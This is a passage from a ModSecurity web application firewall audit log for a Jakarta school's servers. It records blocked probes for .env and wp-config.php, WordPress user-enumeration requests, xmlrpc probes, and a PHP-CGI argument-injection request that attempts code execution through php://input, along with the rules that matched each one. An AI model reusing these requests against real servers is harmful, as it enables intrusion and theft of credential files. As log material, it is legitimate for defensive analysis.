with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746782679920121 942 (- - -) Stopwatch2: 1746782679920121 942; combined=413, p1=376, p2=0, p3=0, p4=0, p5=37, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9f9cae7b-Z-- --5fb1a74b-A-- [09/May/2025:16:37:18 +0700] aB3MzlqQ1nOVx9fWpZRHSgAAAAQ 103.236.140.4 34464 103.236.140.4 8181 --5fb1a74b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.199.223 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.199.223 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --5fb1a74b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5fb1a74b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746783438795104 3529 (- - -) Stopwatch2: 1746783438795104 3529; combined=1800, p1=496, p2=1268, p3=0, p4=0, p5=35, sr=64, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5fb1a74b-Z-- --d3853607-A-- [09/May/2025:16:37:25 +0700] aB3M1VqQ1nOVx9fWpZRHbAAAAAE 103.236.140.4 34944 103.236.140.4 8181 --d3853607-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.199.223 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.199.223 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d3853607-C-- demo.sayHello --d3853607-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d3853607-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746783445311162 5396 (- - -) Stopwatch2: 1746783445311162 5396; combined=4117, p1=502, p2=3295, p3=38, p4=53, p5=126, sr=94, sw=103, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d3853607-Z-- --b442b000-A-- [09/May/2025:16:51:39 +0700] aB3QKx6q_ZMebht3q17W5QAAAII 103.236.140.4 38940 103.236.140.4 8181 --b442b000-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.138.171 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.138.171 X-Forwarded-Proto: https Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* --b442b000-C-- --b442b000-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b442b000-E-- --b442b000-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746784299081599 4136 (- - -) Stopwatch2: 1746784299081599 4136; combined=2622, p1=459, p2=2127, p3=0, p4=0, p5=36, sr=114, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b442b000-Z-- --0da5314a-A-- [09/May/2025:16:55:26 +0700] aB3RDloC-7ITMWTA_c8RfwAAAMc 103.236.140.4 55460 103.236.140.4 8181 --0da5314a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.34.171 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.34.171 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0da5314a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0da5314a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746784526813092 2219 (- - -) Stopwatch2: 1746784526813092 2219; combined=1000, p1=345, p2=629, p3=0, p4=0, p5=25, sr=62, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0da5314a-Z-- --0f2dd14e-A-- [09/May/2025:16:55:33 +0700] aB3RFVoC-7ITMWTA_c8RoQAAAMs 103.236.140.4 55970 103.236.140.4 8181 --0f2dd14e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.34.171 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.34.171 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --0f2dd14e-C-- demo.sayHello --0f2dd14e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --0f2dd14e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746784533648267 5273 (- - -) Stopwatch2: 1746784533648267 5273; combined=3842, p1=491, p2=3101, p3=30, p4=33, p5=106, sr=66, sw=81, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0f2dd14e-Z-- --43728869-A-- [09/May/2025:17:00:37 +0700] aB3SRS-fAO47ojYKsMqy9gAAAFc 103.236.140.4 49862 103.236.140.4 8181 --43728869-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.223.51.157 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.223.51.157 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --43728869-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --43728869-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746784837431991 622 (- - -) Stopwatch2: 1746784837431991 622; combined=223, p1=190, p2=0, p3=0, p4=0, p5=33, sr=48, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --43728869-Z-- --5e68082c-A-- [09/May/2025:17:27:37 +0700] aB3YmVqQ1nOVx9fWpZR_wAAAAAk 103.236.140.4 53650 103.236.140.4 8181 --5e68082c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 217.160.15.151 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 217.160.15.151 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --5e68082c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5e68082c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746786457041848 2843 (- - -) Stopwatch2: 1746786457041848 2843; combined=1245, p1=408, p2=801, p3=0, p4=0, p5=36, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5e68082c-Z-- --0f5d5d15-A-- [09/May/2025:18:18:15 +0700] aB3kd1oC-7ITMWTA_c9TKAAAAMs 103.236.140.4 47314 103.236.140.4 8181 --0f5d5d15-B-- GET /wp-config.php HTTP/1.1 Referer: www.google.com Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 139.59.224.251 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 Cookie: X-Forwarded-For: 139.59.224.251 Accept-Encoding: gzip X-Varnish: 144982385 --0f5d5d15-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --0f5d5d15-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746789495247628 734 (- - -) Stopwatch2: 1746789495247628 734; combined=281, p1=248, p2=0, p3=0, p4=0, p5=33, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0f5d5d15-Z-- --13729626-A-- [09/May/2025:18:18:15 +0700] aB3kdx6q_ZMebht3q14ZgAAAAJg 103.236.140.4 47530 103.236.140.4 8181 --13729626-B-- GET /wp-config.php HTTP/1.1 Referer: www.google.com Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 139.59.224.251 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 Cookie: X-Forwarded-For: 139.59.224.251 Accept-Encoding: gzip X-Varnish: 145066033 --13729626-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --13729626-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746789495268687 813 (- - -) Stopwatch2: 1746789495268687 813; combined=301, p1=267, p2=0, p3=0, p4=0, p5=34, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --13729626-Z-- --1d58dd5c-A-- [09/May/2025:18:23:03 +0700] aB3ll1oC-7ITMWTA_c9T3QAAAME 103.236.140.4 48474 103.236.140.4 8181 --1d58dd5c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.90.233.71 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.90.233.71 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --1d58dd5c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1d58dd5c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746789783842510 2827 (- - -) Stopwatch2: 1746789783842510 2827; combined=1491, p1=447, p2=1009, p3=0, p4=0, p5=35, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1d58dd5c-Z-- --028a4452-A-- [09/May/2025:18:24:14 +0700] aB3l3h6q_ZMebht3q14ZgQAAAJQ 103.236.140.4 48708 103.236.140.4 8181 --028a4452-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 203.96.224.65 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 203.96.224.65 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --028a4452-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --028a4452-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746789854671740 3241 (- - -) Stopwatch2: 1746789854671740 3241; combined=1530, p1=510, p2=990, p3=0, p4=0, p5=30, sr=85, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --028a4452-Z-- --497d4234-A-- [09/May/2025:18:31:24 +0700] aB3njB6q_ZMebht3q14azgAAAJE 103.236.140.4 50374 103.236.140.4 8181 --497d4234-B-- GET /wp-config.php HTTP/1.0 Referer: www.google.com Host: up.smkn22jakarta.sch.id X-Real-IP: 139.59.224.251 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 139.59.224.251 X-Forwarded-Proto: http Connection: close User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --497d4234-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --497d4234-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746790284686767 729 (- - -) Stopwatch2: 1746790284686767 729; combined=263, p1=230, p2=0, p3=0, p4=0, p5=33, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --497d4234-Z-- --00f1e133-A-- [09/May/2025:18:31:24 +0700] aB3njFqQ1nOVx9fWpZSkSQAAAAk 103.236.140.4 50376 103.236.140.4 8181 --00f1e133-B-- GET /wp-config.php HTTP/1.0 Referer: www.google.com Host: up.smkn22jakarta.sch.id X-Real-IP: 139.59.224.251 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 139.59.224.251 X-Forwarded-Proto: https Connection: close User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --00f1e133-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --00f1e133-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746790284726029 724 (- - -) Stopwatch2: 1746790284726029 724; combined=294, p1=262, p2=0, p3=0, p4=0, p5=32, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --00f1e133-Z-- --80128814-A-- [09/May/2025:18:56:28 +0700] aB3tbB6q_ZMebht3q14bagAAAJI 103.236.140.4 53618 103.236.140.4 8181 --80128814-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 185.136.194.203 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.136.194.203 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --80128814-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --80128814-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746791788475554 2202 (- - -) Stopwatch2: 1746791788475554 2202; combined=1073, p1=351, p2=694, p3=0, p4=0, p5=28, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --80128814-Z-- --018a8f6b-A-- [09/May/2025:18:58:52 +0700] aB3t_C-fAO47ojYKsMrx9gAAAE8 103.236.140.4 53638 103.236.140.4 8181 --018a8f6b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 197.230.116.154 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 197.230.116.154 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --018a8f6b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --018a8f6b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746791932819693 3072 (- - -) Stopwatch2: 1746791932819693 3072; combined=1293, p1=427, p2=837, p3=0, p4=0, p5=29, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --018a8f6b-Z-- --e3142b76-A-- [09/May/2025:19:03:02 +0700] aB3u9i-fAO47ojYKsMrx-gAAAEk 103.236.140.4 53670 103.236.140.4 8181 --e3142b76-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 102.134.52.114 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 102.134.52.114 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --e3142b76-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e3142b76-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746792182390167 2733 (- - -) Stopwatch2: 1746792182390167 2733; combined=1249, p1=411, p2=808, p3=0, p4=0, p5=30, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e3142b76-Z-- --60c3ea2b-A-- [09/May/2025:19:13:00 +0700] aB3xTFqQ1nOVx9fWpZSm0gAAABI 103.236.140.4 53730 103.236.140.4 8181 --60c3ea2b-B-- GET /.env HTTP/1.0 